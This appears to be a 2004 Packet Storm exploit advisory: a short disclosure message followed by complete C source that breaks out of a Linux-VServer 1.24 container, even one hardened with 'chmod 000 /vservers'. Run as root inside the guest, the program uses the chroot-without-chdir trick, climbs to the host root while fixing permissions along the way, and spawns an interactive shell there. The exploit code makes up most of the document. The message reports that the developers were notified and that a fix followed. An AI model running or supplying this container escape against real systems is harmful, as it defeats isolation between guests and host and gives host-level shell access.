vserver_chroot.txt

2004-02-06T00:00:00
ID PACKETSTORM:32634
Type packetstorm
Reporter Markus Mueller
Modified 2004-02-06T00:00:00

Description

                                        
`Hi securityfocus,  
  
a small exploit from me which breaks out of a vserver, also if secured   
with "chmod 000 /vservers". It is a modification of the known   
"chroot-again" exploit. It belongs to chroots but also to the vserver   
project. Tested with linux 2.4.24 and vserver 1.24. The bug was posted   
to the developers, and in the today released version 1.25 it seems to be   
fixed.  
  
/* vserver@deadbeef.de modified the chroot-again exploit */  
/* to work on vservers with "chmod 000 /vservers" */  
  
/* Run this code in a vserver as root */  
/* Tested with 2.4.24 and vserver 1.24 */  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sys/types.h>  
#include <sys/stat.h>  
  
int main(void)  
{  
    int i;  
  
    if (chdir("/") != 0) {  
        perror("cd /"); exit(1);  
    }  
    if (mkdir("baz", 0777) != 0) {  
        perror("mkdir baz");  
    }  
    /* chroot() without a following chdir(): cwd stays outside the new root */  
    if (chroot("baz") != 0) {  
        perror("chroot baz"); exit(1);  
    }  
  
    for (i=0; i<50; i++) {  
        if (chdir("..") != 0) {  
            perror("cd .."); /* exit(1); */  
        }  
        /* make the parent searchable again (the "chmod 000 /vservers" barrier) */  
        if (chmod("..", S_IXOTH) != 0) {  
            perror("chmod"); /* exit(1); */  
        }  
    }  
    if (chroot(".") != 0) {  
        perror("chroot ."); exit(1);  
    }  
    printf("Exploit seems to work. =)\n");  
    execl("/bin/sh", "sh", "-i", (char *)0);  
    perror("exec sh");  
    exit(0);  
}  
  
The developers have been notified.  
  
Greetings,  
Markus Müller  
GeNUA mbH  
`